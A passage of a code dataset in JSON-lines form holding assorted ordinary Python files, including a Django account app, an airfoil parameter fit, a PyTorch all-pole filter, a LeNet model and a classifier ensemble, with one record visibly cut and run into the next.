lstMonsters):\n\t\tif(len(lstMonsters)<=0):\n\t\t\treturn\n\t\tfor monster in lstMonsters:\n\t\t\tif (monster.scared):\n\t\t\t\tmonster.Eaten()\n\t\t\telse:\n\t\t\t\tpygame.event.post(pygame.event.Event(PLAYER_EATEN, {}))\n","repo_name":"frummage/omnom","sub_path":"omnom/greenManSprite.py.py","file_name":"greenManSprite.py.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15936797711","text":"\nimport os\nclass ProfileDatum(object):\n def __init__(self,\n device_name,\n node_exec_stats,\n file_path,\n line_number,\n func_name,\n op_type):\n \"\"\"Constructor.\n Args:\n device_name: (string) name of the device.\n 
+{"seq_id":"15936797711","text":"\nimport os\nclass ProfileDatum(object):\n def __init__(self,\n device_name,\n node_exec_stats,\n file_path,\n line_number,\n func_name,\n op_type):\n \"\"\"Constructor.\n Args:\n device_name: (string) name of the device.\n node_exec_stats: `NodeExecStats` proto.\n file_path: path to the source file involved in creating the op.\n line_number: line number in the file involved in creating the op.\n func_name: name of the function that the line belongs to.\n op_type: (string) Operation type.\n \"\"\"\n self.device_name = device_name\n self.node_exec_stats = node_exec_stats\n self.file_path = file_path\n self.line_number = line_number\n self.func_name = func_name\n if self.file_path:\n self.file_line_func = \"%s:%d(%s)\" % (\n os.path.basename(self.file_path), self.line_number, self.func_name)\n else:\n self.file_line_func = \"\"\n self.op_type = op_type\n self.start_time = self.node_exec_stats.all_start_micros\n self.op_time = (self.node_exec_stats.op_end_rel_micros -\n self.node_exec_stats.op_start_rel_micros)\n @property\n def exec_time(self):\n return self.node_exec_stats.all_end_rel_micros\nclass AggregateProfile(object):\n def __init__(self, profile_datum):\n \"\"\"Constructor.\n Args:\n profile_datum: (`ProfileDatum`) an instance of `ProfileDatum` to\n initialize this object with.\n \"\"\"\n self.total_op_time = profile_datum.op_time\n self.total_exec_time = profile_datum.exec_time\n device_and_node = \"%s:%s\" % (profile_datum.device_name,\n profile_datum.node_exec_stats.node_name)\n self._node_to_exec_count = {device_and_node: 1}\n def add(self, profile_datum):\n \"\"\"Accumulate a new instance of ProfileDatum.\n Args:\n profile_datum: (`ProfileDatum`) an instance of `ProfileDatum` to\n accumulate to this object.\n \"\"\"\n self.total_op_time += profile_datum.op_time\n self.total_exec_time += profile_datum.exec_time\n device_and_node = \"%s:%s\" % (profile_datum.device_name,\n profile_datum.node_exec_stats.node_name)\n if device_and_node in self._node_to_exec_count:\n self._node_to_exec_count[device_and_node] += 1\n else:\n self._node_to_exec_count[device_and_node] = 1\n @property\n def node_count(self):\n return len(self._node_to_exec_count)\n @property\n def node_exec_count(self):\n return sum(self._node_to_exec_count.values())\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_2/profiling.py.transformed.py","file_name":"profiling.py.transformed.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
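A hedged usage sketch for the two profiling classes above. In the original (TensorFlow-derived) code `node_exec_stats` is a `NodeExecStats` protobuf; a `SimpleNamespace` stands in for it here purely to exercise the aggregation arithmetic, assuming `ProfileDatum` and `AggregateProfile` are defined as shown:

```python
from types import SimpleNamespace

stats = SimpleNamespace(all_start_micros=10, op_start_rel_micros=1,
                        op_end_rel_micros=5, all_end_rel_micros=9,
                        node_name="MatMul")
datum = ProfileDatum("cpu:0", stats, "model.py", 42, "forward", "MatMul")

agg = AggregateProfile(datum)
agg.add(datum)  # accumulate a second execution of the same node
print(agg.total_op_time, agg.total_exec_time)  # 8 18
print(agg.node_count, agg.node_exec_count)     # 1 2
```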
+{"seq_id":"12482399241","text":"from math import factorial\nimport numpy as np\nimport scipy.optimize\n\n\ndef get_airfoil_coord(wu, wl, yute, ylte, x=None):\n # N1 and N2 parameters (N1 = 0.5 and N2 = 1 for airfoil shape)\n N1 = 0.5\n N2 = 1\n\n # Create x coordinate\n if x is None: # if x is not provided\n N = 161 #TODO: hard coded for now\n # x is listed in XFoil format, i.e. counter-clockwise starting from upper trailing edge, wrapping around leading edge and ending at lower trailing edge\n x = 0.5 * (1 + np.cos(np.linspace(0, 2*np.pi, N)))\n\n j_le = np.argmin(x)\n xu = x[:j_le] # upper surface x-coordinates\n xl = x[j_le:] # lower surface x-coordinates\n\n yu = eval_shape_fcn(wu, xu, N1, N2, yute) # upper surface y-coordinates\n yl = eval_shape_fcn(wl, xl, N1, N2, ylte) # lower surface y-coordinates\n\n y = np.concatenate([yu, yl])\n\n return np.array([x, y]).T\n\n\ndef eval_shape_fcn(w, x, N1, N2, yte):\n \"\"\"\n compute class and shape function\n :param w:\n :param x:\n :param N1:\n :param N2:\n :param yte: trailing edge y coordinate\n :return:\n \"\"\"\n C = x**N1 * (1-x)**N2\n\n n = len(w) - 1 # degree of Bernstein polynomials\n\n S = np.zeros_like(x)\n for j in range(0, n+1):\n K = factorial(n)/(factorial(j)*(factorial(n-j)))\n S += w[j]*K*x**j * ((1-x)**(n-j))\n\n return C * S + x * yte\n\n\ndef list_to_kulfan_params(var):\n nw = len(var) // 2\n wu = var[0:nw]\n wl = var[nw:(2*nw)]\n\n assert len(var) == (2 * nw)\n return wu, wl\n\n\ndef obj_fcn_airfoil_inversion(var, xy_ref):\n \"\"\"\n objective function to minimize: discrepancy between reference coordinates and parametrized airfoil coordinates\n :param var: variable to optimize\n :param xy_ref: n-by-2 array of reference coordinates following XFoil format (CCW)\n :return:\n \"\"\"\n wu, wl = list_to_kulfan_params(var)\n yute = xy_ref[0, 1]\n ylte = xy_ref[-1, 1]\n\n xy_kulfan = get_airfoil_coord(wu, wl, yute, ylte, x=xy_ref[:, 0])\n\n # scale for normalization\n y_scale = np.max(xy_ref[:, 1]) - np.min(xy_ref[:, 1])\n # y_scale = 1e-2 # an arbitrary scale\n # y_scale = np.maximum(1e-2, np.fabs(xy_ref[:, 1]))\n # y_scale = np.max(xy_ref[:, 1]) - np.min(xy_ref[:, 1]) * (2 - np.cos(2*pi*xy_ref[:, 0]/xte))\n\n npts = xy_ref.shape[0]\n\n return np.sum(((xy_ref[:, 1] - xy_kulfan[:, 1]) / y_scale)**2.0) / npts\n\n\ndef infer_kulfan_params(xy_ref, var_init):\n \"\"\"\n infer kulfan parameters given reference/target airfoil coordinates\n \"\"\"\n nvar = len(var_init)\n lb = [-2.] * nvar\n ub = [2.] 
* nvar\n\n if True:\n bounds = scipy.optimize.Bounds(lb, ub, keep_feasible=False)\n options_opt = {\"maxiter\": 1e6}\n\n opt_method = \"SLSQP\"\n # opt_method = \"L-BFGS-B\"\n # opt_method = \"TNC\"\n opt_result = scipy.optimize.minimize(obj_fcn_airfoil_inversion, var_init, args=xy_ref,\n method=opt_method, tol=1e-16, bounds=bounds, options=options_opt)\n else:\n obj_fcn = lambda x: obj_fcn_airfoil_inversion(x, xy_ref)\n opt_result = scipy.optimize.dual_annealing(obj_fcn, bounds=list(zip(lb, ub)), seed=1234)\n\n print(f\"Optimization result:\\n{opt_result}\")\n\n return list_to_kulfan_params(opt_result.x)\n\n\ndef main():\n import sys\n if sys.platform == 'darwin': # MacOS\n import matplotlib\n matplotlib.use('Qt5Agg')\n import matplotlib.pyplot as plt\n import os\n\n path = './data/'\n\n # reference coordinates\n # airfoilname = \"RAE2822\"\n # airfoilname = \"b737a-il\"\n airfoilname = \"e387\"\n # airfoilname = \"whitcomb\"\n # airfoilname = \"nasasc2-0714\"\n fname_input_airfoil = os.path.join(path, f\"{airfoilname}.txt\")\n xy_ref = np.genfromtxt(fname_input_airfoil, dtype=float, skip_header=1)\n\n airfoilname_inverse = f\"{airfoilname}_kulfan\"\n\n # fix trailing edge y coordinates based on reference airfoil coordinates\n yute = xy_ref[0, 1]\n ylte = xy_ref[-1, 1]\n\n poly_deg = 5\n wu = [0.1] * (poly_deg + 1)\n wl = [-0.1] * (poly_deg + 1)\n\n var_init = list()\n var_init.extend(wu)\n var_init.extend(wl)\n\n xy_coords_init = get_airfoil_coord(wu, wl, yute, ylte)\n # plot initial guess of airfoil\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(111)\n ax.plot(xy_ref[:, 0], xy_ref[:, 1], \"k.--\", label=\"Input\")\n ax.plot(xy_coords_init[:, 0], xy_coords_init[:, 1], \"-.\", linewidth=2, label=\"Initial guess\")\n\n ax.legend()\n ax.grid(True)\n ax.set_xlim([0, 1])\n ax.axis('equal')\n ax.set_xticks(np.arange(0, 1.1, 0.1))\n plt.show(block=True)\n\n # infer Kulfan parameters by optimization\n wu, wl = infer_kulfan_params(xy_ref, var_init)\n\n # get inferred Kulfan airfoil coordinates\n xy_coords = get_airfoil_coord(wu, wl, yute, ylte)\n\n # save to coordinate file\n fpath = os.path.join(path, f'{airfoilname_inverse}.dat')\n np.savetxt(fpath, xy_coords, delimiter=\" \", newline=\"\\n\")\n\n # plot airfoil\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(111)\n ax.plot(xy_coords[:, 0], xy_coords[:, 1], marker=\".\", linewidth=2, label=airfoilname_inverse)\n ax.plot(xy_coords_init[:, 0], xy_coords_init[:, 1], \"-.\", linewidth=2, label=\"Initial guess\")\n ax.plot(xy_ref[:, 0], xy_ref[:, 1], \"k.--\", label=\"Input\")\n\n ax.legend()\n ax.grid(True)\n ax.set_xlim([0, 1])\n ax.axis('equal')\n ax.set_xticks(np.arange(0, 1.1, 0.1))\n\n ax.set_title(f\"Kulfan airfoil with parameters: yute={yute:.4e}, ylte={ylte:.4e}\\n\"\n f\"wu={wu}\\nwl={wl}\")\n\n fig.tight_layout()\n\n fig.savefig(os.path.join(path, f'{airfoilname_inverse}.png'))\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"zsmeditation/airfoil_param","sub_path":"kulfan_airfoil.py","file_name":"kulfan_airfoil.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"35245047602","text":"import sys\nfrom collections import deque\nfrom heapq import heappush, heappop\n\ndef bfs():\n q = deque()\n\n q.append((0,0))\n vis[0][0] = 0\n\n while q:\n (x,y) = q.popleft()\n \n for i in range(4):\n _dx = x + dx[i]\n _dy = y + dy[i]\n\n if 0<= _dx < r and 0<=_dy\\d+)/$', RequestCarsList.as_view(), 
name='request_cars'),\n]","repo_name":"aurimukas/compensa","sub_path":"com_local/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17638978686","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\nImplement a magic directory with buildDict, and search methods.\n\nFor the method buildDict, you'll be given a list of non-repetitive words to build a dictionary.\n\nFor the method search, you'll be given a word, and judge whether if you modify exactly one character into another character in this word, the modified word is in the dictionary you just built.\n\nExample 1:\nInput: buildDict([\"hello\", \"leetcode\"]), Output: Null\nInput: search(\"hello\"), Output: False\nInput: search(\"hhllo\"), Output: True\nInput: search(\"hell\"), Output: False\nInput: search(\"leetcoded\"), Output: False\nNote:\nYou may assume that all the inputs are consist of lowercase letters a-z.\nFor contest purpose, the test data is rather small by now. You could think about highly efficient algorithm after the contest.\nPlease remember to RESET your class variables declared in class MagicDictionary, as static/class variables are persisted across multiple test cases. Please see here for more details.\n\n\"\"\"\n\n\nclass MagicDictionary(object):\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.trie = {}\n\n def buildDict(self, dict):\n \"\"\"\n Build a dictionary through a list of words\n :type dict: List[str]\n :rtype: void\n \"\"\"\n\n for i, word in enumerate(dict):\n t = self.trie\n for j, v in enumerate(word):\n if v not in t:\n t[v] = {'#': False}\n t = t[v]\n t['#'] = True\n\n def search(self, word):\n \"\"\"\n Returns if there is any word in the trie that equals to the given word after modifying exactly one character\n :type word: str\n :rtype: bool\n \"\"\"\n if not word:\n return False\n\n chs = [chr(i) for i in range(ord('a'), ord('a') + 26)]\n for i in range(len(word)):\n for ch in chs:\n if ch != word[i]:\n # print(\"searching \" + word[:i] + ch + word[i+1:])\n if self.search_impl(word[:i] + ch + word[i + 1:], self.trie):\n return True\n\n return False\n\n def search_impl(self, word, trie):\n t = trie\n for i, v in enumerate(word):\n if v not in t:\n return False\n t = t[v]\n\n return t['#']\n\n\n # Your MagicDictionary object will be instantiated and called as such:\n # obj = MagicDictionary()\n # obj.buildDict(dict)\n # param_2 = obj.search(word)\n\nd = MagicDictionary()\nd.buildDict([\"hello\", \"hallo\", \"leetcode\"])\nprint(d.search(\"hello\"))\nprint(d.search(\"hello\"))\nprint(d.search(\"hell\"))\nprint(d.search(\"leetcodd\"))","repo_name":"shhuan/algorithms","sub_path":"leetcode/medium/Implement_Magic_Dictionary.py","file_name":"Implement_Magic_Dictionary.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27827552746","text":"class Employee:\n num_of_emps = 0\n raise_amount = 1.04\n\n # below is constructor\n def __init__(self, first, last, pay):\n self.first = first\n self.last = last\n self.pay = pay\n self.email = first + '.' 
+ last + '@company.com'\n self.dates = []\n Employee.num_of_emps += 1\n\n def fullname(self):\n return '{} {}'.format(self.first, self.last)\n\n def apply_raise(self):\n self.pay = int(self.pay * Employee.raise_amount) # could also do self.raise_amount\n\n\nemp_1 = Employee('Corey', 'Schafer', 50000)\nemp_2 = Employee('Test', 'User', 60000)\nemp_1.dates.append('test');\n\nprint(emp_1.pay)\nemp_1.apply_raise()\nprint(emp_1.pay)\nprint(emp_1.dates)\n","repo_name":"kevdevrev/Live_Graph_Matplotlib","sub_path":"clasesfun.py","file_name":"clasesfun.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18210700522","text":"class Solution:\n def nextLargerNodes(self, head: ListNode) -> List[int]:\n ans = []\n stack = []\n\n while head:\n while stack and head.val > ans[stack[-1]]:\n index = stack.pop()\n ans[index] = head.val\n stack.append(len(ans))\n ans.append(head.val)\n head = head.next\n\n for i in stack:\n ans[i] = 0\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1019. Next Greater Node In Linked List/1019.py","file_name":"1019.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"17717758026","text":"import torch\nfrom torch import nn\n\nclass LeNet(nn.Module):\n def __init__(self):\n super(LeNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 6, kernel_size=5),\n nn.ReLU(),\n nn.AvgPool2d(2),\n\n nn.Conv2d(6, 16, kernel_size= 5),\n nn.ReLU(),\n nn.AvgPool2d(2),\n\n nn.Flatten(),\n\n nn.Linear(16 * 5 * 5, 120),\n nn.ReLU(),\n\n nn.Linear(120, 84),\n nn.ReLU(),\n\n nn.Linear(84, 10),\n )\n\n def forward(self, x):\n x = self.features(x)\n return x\n","repo_name":"sonLe-Thanh/PHDimExperiments","sub_path":"models/LeNet.py","file_name":"LeNet.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12482399241","text":"import torch\nimport torch.nn.functional as F\n\ndef allpole(x: torch.Tensor, a: torch.Tensor) -> torch.Tensor:\n \"\"\"\n All-pole filter\n :param x: input signal,\n shape (B, C, T) (batch, channels, timesteps)\n :param a: filter coefficients (denominator),\n shape (C, N, T) (channels, num taps, timesteps)\n :return: filtered signal\n shape (B, C, T) (batch, channels, timesteps)\n \"\"\"\n y = torch.zeros_like(x)\n\n a_normalized = a / a[:, 0:1, :]\n\n # filter order\n p = a.shape[1] - 1\n\n # filter coefficients\n a1 = a_normalized[:, 1:, :]\n\n # flip coefficients\n a1 = torch.flip(a1, [1])\n\n # zero pad y by filter order\n y = torch.nn.functional.pad(y, (p, 0))\n\n # filter\n for i in range(p, y.shape[-1]):\n y[..., i] = x[..., i - p] - \\\n torch.sum(a1[..., i - p] * y[..., i - p:i], dim=-1)\n\n return y[..., p:]\n\nclass AllPoleFunction(torch.autograd.Function):\n\n @staticmethod\n def forward(ctx, x, a):\n y = allpole(x, a)\n ctx.save_for_backward(y, x, a)\n return y\n\n @staticmethod\n def backward(ctx, dy):\n y, x, a = ctx.saved_tensors\n dx = da = None\n\n n_batch = x.size(0)\n n_channels = x.size(1)\n p = a.size(1) - 1\n T = dy.size(-1)\n\n # filter or\n dyda = allpole(-y, a)\n dyda = torch.nn.functional.pad(dyda, (p, 0))\n\n # da = torch.zeros_like(a)\n # for i in range(0, T):\n # for j in range(0, p):\n # da[:, p, i] = dyda[..., i:i+T] * dy\n # da = da.flip([1])\n\n\n da = F.conv1d(\n dyda.view(1, n_batch * n_channels, -1),\n 
dy.view(n_batch * n_channels, 1, -1),\n groups=n_batch * n_channels).view(n_batch, n_channels, -1).sum(0).flip(1)\n \n dx = allpole(dy.flip(-1), a.flip(-1)).flip(-1)\n\n return dx, da\n\nclass AllPole(torch.nn.Module):\n\n def __init__(self):\n super().__init__()\n\n def forward(self, x, a):\n return AllPoleFunction.apply(x, a)\n\n","repo_name":"ljuvela/GlotNet","sub_path":"glotnet/sigproc/allpole.py","file_name":"allpole.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12255874424","text":"# IP address of the MQTT broker\nIP='localhost'\n\n# port of the MQTT broker\nPORT=1883\n\n# name of the MQTT broker topic\nTOPIC='abotcmd1'\n\n# linear speed of the bot in metres per second\nLINEAR_VELOCITY=1.0\n\n# turning speed of the bot in radians per second\nANGULAR_VELOCITY=1.5707963267948966\n\n# name of the coordinates file\nFILE='path.txt'\n\n\n\n","repo_name":"bairdob/IntellectualTechnicalSystems","sub_path":"part1/practice1/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39605970521","text":"from django.urls import reverse\nfrom django.conf import settings\nfrom django.shortcuts import redirect, render\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes, force_str\nfrom django.template.loader import render_to_string\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import EmailMessage\n\nfrom apps.account.models import Account\nfrom .forms import RegistrationForm, UserForm\nfrom apps.account.utils import generate_token\n\n\ndef home(request):\n return render(request, 'base.html')\n\ndef send_activation_email(user: Account, request):\n current_site = get_current_site(request)\n email_subject = 'Activate your account'\n email_body = render_to_string('accounts/verify.html', {\n 'user': user,\n 'domain': current_site,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': generate_token.make_token(user)\n })\n EmailMessage(\n subject=email_subject, \n body=email_body, \n from_email=settings.EMAIL_FROM_USER, \n to=[user.email]\n ).send()\n\n\ndef log_user_in(request):\n if request.method == \"POST\":\n form = UserForm(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"You are now logged in as {username}.\")\n return redirect(\"homepage\")\n else:\n messages.error(request,\"Invalid username or password.\")\n else:\n messages.error(request,\"Invalid username or password.\")\n else:\n form = UserForm()\n return render(request, 'accounts/login.html', context={'form':form})\n\n\ndef log_user_out(request):\n if request.user.is_authenticated:\n logout(request)\n return redirect('login')\n\n\ndef register(request):\n if request.user.is_authenticated:\n next_url = request.GET.get('next') or 'homepage'\n return redirect(next_url)\n if request.method == 'POST':\n form = RegistrationForm(request.POST,request.FILES)\n if form.is_valid():\n user = form.save(commit=True)\n user.is_active = True\n user.save()\n send_activation_email(user, request)\n login(request, 
user)\n next_url = request.POST.get('next')\n return redirect(next_url)\n else:\n form = RegistrationForm(request.POST,request.FILES)\n else:\n form = RegistrationForm()\n return render(request, 'accounts/register.html', context={'form': form, 'next': request.GET.get('next') or 'homepage'})\n\n\ndef activate_user(request, uid64, token):\n try:\n uid = force_str(urlsafe_base64_decode(uid64))\n user = Account.objects.get(pk=uid)\n except Exception as e:\n user = None\n\n if user and generate_token.check_token(user, token):\n user.is_email_verified = True\n user.save()\n\n messages.add_message(request, messages.SUCCESS, 'Email verified, you can log in now')\n return redirect(reverse('login'))\n\n return render(request, 'accounts/activation-failed.html', {'user': user})","repo_name":"Msibragimov/test_for_test","sub_path":"apps/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36911984020","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 3 10:37:43 2020\n\n@author: javier.moral.hernan1\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom xgboost import XGBClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.metrics import balanced_accuracy_score\nfrom src.models.neural_net.createNeuralNetwork import NeuralNetModel\n\n\nclass MajorityMinorityEnsemble():\n\n def __init__(self, X_train, X_test,\n y_train, y_test, external_data,\n model_1_selected, model_2_selected):\n\n self.X_train = X_train\n self.X_test = X_test\n self.y_train = y_train\n self.y_test = y_test\n self.external_data = external_data\n self.filter_minority()\n self.model_1_selected = model_1_selected\n self.select_first_model()\n self.model_2_selected = model_2_selected\n self.select_second_model()\n self.fit()\n self.predict()\n self.score()\n\n def filter_minority(self):\n '''\n Creates a binary target where value 1 matches the majority class\n instances and 0 all remaining classes, filters a second train set\n with minority class instances\n\n Returns\n -------\n None.\n '''\n mask_train = self.y_train['CLASE'] != 'RESIDENTIAL'\n self.X_train_minority = self.X_train[mask_train].copy()\n self.y_train_minority = self.y_train[mask_train].copy()\n self.y_train_binary = self.y_train[\n 'CLASE'].map(lambda x: 1 if x == 'RESIDENTIAL' else 0)\n self.target_encoder = LabelEncoder()\n self.y_train_minority = self.target_encoder.fit_transform(\n self.y_train_minority)\n\n def select_first_model(self):\n '''\n Gets the first model selected.\n\n Returns\n -------\n None.\n '''\n if self.model_1_selected == 'randomforest':\n self.model1 = RandomForestClassifier(class_weight='balanced')\n if self.model_1_selected == 'gradientboosting':\n self.model1 = GradientBoostingClassifier()\n if self.model_1_selected == 'xgboost':\n self.model1 = XGBClassifier(\n learning_rate=0.1, max_depth=3, min_child_weight=1,\n n_estimators=100, n_jobs=-1)\n if self.model_1_selected == 'nn':\n self.NN = NeuralNetModel(self.X_train)\n self.model1 = self.NN.model\n\n def 
select_second_model(self):\n '''\n Gets the second model selected.\n\n Returns\n -------\n None.\n '''\n if self.model_2_selected == 'randomforest':\n self.model2 = RandomForestClassifier(class_weight='balanced')\n if self.model_2_selected == 'gradientboosting':\n self.model2 = GradientBoostingClassifier()\n if self.model_2_selected == 'xgboost':\n self.model2 = XGBClassifier(\n learning_rate=0.1, max_depth=3, min_child_weight=1,\n n_estimators=100, n_jobs=-1)\n if self.model_2_selected == 'nn':\n self.NN = NeuralNetModel(self.X_train)\n self.model2 = self.NN.model\n\n def fit(self):\n '''\n Fits the models selected using their corresponding train data:\n - First model with the whole set and binary target\n - Second model with minority class instances.\n\n Returns\n -------\n None.\n '''\n self.model1.fit(self.X_train, self.y_train_binary)\n self.model2.fit(self.X_train_minority, self.y_train_minority)\n\n def inverse_encoding(self, data):\n '''\n Decodes previously encoded data.\n\n Returns\n -------\n data_uncoded. The decoded labels.\n '''\n data_uncoded = self.target_encoder.inverse_transform(data)\n return data_uncoded\n\n def predictDataset(self, preds1, preds2):\n predictions = pd.concat([preds1,\n preds2], axis=1)\n predictions.columns = ['model1', 'model2']\n predictions['preds'] = 'nan'\n for row in predictions.iterrows():\n if row[1]['model1'] == 1:\n predictions.at[row[0], 'preds'] = 'RESIDENTIAL'\n else:\n predictions.at[row[0], 'preds'] = row[1]['model2']\n return predictions\n\n def predict(self):\n '''\n Computes predictions for each dataset using the fitted model.\n\n Returns\n -------\n None.\n '''\n preds_train1 = pd.DataFrame(self.model1.predict(self.X_train))\n preds_test1 = pd.DataFrame(self.model1.predict(self.X_test))\n preds_ext1 = pd.DataFrame(self.model1.predict(self.external_data))\n preds_train2 = pd.DataFrame(\n self.inverse_encoding(self.model2.predict(self.X_train)))\n preds_test2 = pd.DataFrame(\n self.inverse_encoding(self.model2.predict(self.X_test)))\n preds_ext2 = pd.DataFrame(\n self.inverse_encoding(self.model2.predict(self.external_data)))\n preds_train_df = self.predictDataset(preds_train1, preds_train2)\n preds_test_df = self.predictDataset(preds_test1, preds_test2)\n preds_ext_df = self.predictDataset(preds_ext1, preds_ext2)\n self.preds_train = preds_train_df['preds']\n self.preds_test = preds_test_df['preds']\n self.preds_ext = preds_ext_df['preds']\n\n\n def score(self):\n '''\n Computes and stores the accuracy, balanced accuracy, confusion matrix\n and f1_macro metrics for train and test predictions.\n\n Returns\n -------\n None.\n '''\n self.acc_train = accuracy_score(self.y_train, self.preds_train)\n self.acc_test = accuracy_score(self.y_test, self.preds_test)\n self.balanced_acc_train = balanced_accuracy_score(self.y_train,\n self.preds_train)\n self.balanced_acc_test = balanced_accuracy_score(self.y_test,\n self.preds_test)\n self.f1_train = f1_score(self.y_train, self.preds_train,\n average='macro')\n self.f1_test = f1_score(self.y_test, self.preds_test,\n average='macro')\n self.cf_train = confusion_matrix(self.y_train, self.preds_train)\n self.cf_test = confusion_matrix(self.y_test, self.preds_test)\n\n def get_score(self):\n '''\n Computes the score using some metrics for train and test predictions.\n\n Returns\n -------\n Scores. dict. 
Dictionary with all the stored metrics\n '''\n scores = {'Accuracy_train': self.acc_train,\n 'Accuracy_test': self.acc_test,\n 'Balanced_Accuracy_train': self.balanced_acc_train,\n 'Balanced_Accuracy_test': self.balanced_acc_test,\n 'F1_train': self.f1_train,\n 'F1_test': self.f1_test,\n 'CM train': self.cf_train,\n 'CM test': self.cf_test}\n return scores\n \n def get_predictions(self, dataset='test'):\n '''\n Computes the predictions for the selected dataset using the\n fitted model.\n\n Returns\n -------\n preds_comp. pandas.DataFrame.\n '''\n if dataset == 'train':\n dict_preds = {'y_train': list(self.y_train),\n 'preds': list(self.preds_train)}\n preds_comp = pd.DataFrame(dict_preds)\n\n if dataset == 'test':\n dict_preds = {'y_test': list(self.y_test),\n 'preds': list(self.preds_test)}\n preds_comp = pd.DataFrame(dict_preds)\n if dataset == 'external':\n preds_comp = pd.DataFrame(self.preds_ext)\n return preds_comp\n\n def get_var_importance(self):\n '''\n Shows the second model's variable importance of the trained model.\n\n Returns\n -------\n fig. matplotlib.pyplot.figure. Barplot with feature importances\n '''\n features_imp = {}\n self.model_selected = self.model2\n for column, importance in zip(\n self.X_train.columns,\n self.model_selected.feature_importances_):\n features_imp[column] = importance\n features_imp_df_train = (pd.DataFrame.from_dict(features_imp,\n orient='index')\n .reset_index()\n .sort_values(by=[0], ascending=False))\n features_imp_df_train.columns = ['Variable', 'Importance']\n features_imp_df_train = features_imp_df_train.iloc[0:10, :]\n fig = plt.figure(figsize=(5, 4))\n sns.barplot(y='Variable', x='Importance',\n data=features_imp_df_train)\n plt.title('Model Variable Importance')\n return fig\n","repo_name":"javiermoralh/Minsait_Land_Classification_DataShow","sub_path":"src/models/majority_minority_ensemble.py","file_name":"majority_minority_ensemble.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17806616884","text":"\r\nclass Bank:\r\n def __init__(self, total):\r\n self.total = total\r\n self.version = 'V27'\r\n\r\n def input_money(self, _input):\r\n self.total += _input\r\n print(\"[ATM] total balance: \", self.total)\r\n\r\n def withdraw_money(self, _output):\r\n if self.total < _output:\r\n print(\"[error] Not enough balance.\")\r\n else:\r\n self.total -= _output\r\n print(\"[ATM] total balance: \", self.total)\r\n\r\n def show_information(self):\r\n print(\"[ATM] This machine is available (\", self.version, \")\")\r\n\r\n\r\nif __name__ == '__main__':\r\n machine_a = Bank(100)\r\n machine_a.input_money(5000)\r\n machine_a.withdraw_money(400)\r\n machine_a.show_information()\r\n\r\n\r\n\r\n","repo_name":"posjkh22-sub/python_basic","sub_path":"(2019-12-25) first commit/project3/bank_module.py","file_name":"bank_module.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30855029298","text":"import random\n\nfrom mathmaker.lib import shared\nfrom mathmaker.lib.constants.latex import COLORED_QUESTION_MARK\nfrom mathmaker.lib.core.root_calculus import Value\nfrom mathmaker.lib.core.base_calculus import Product\nfrom mathmaker.lib.document.content import component\n\n\nclass sub_object(component.structure):\n\n def __init__(self, build_data, **options):\n nb_list = list(build_data)\n self.nb1, self.nb2 = 
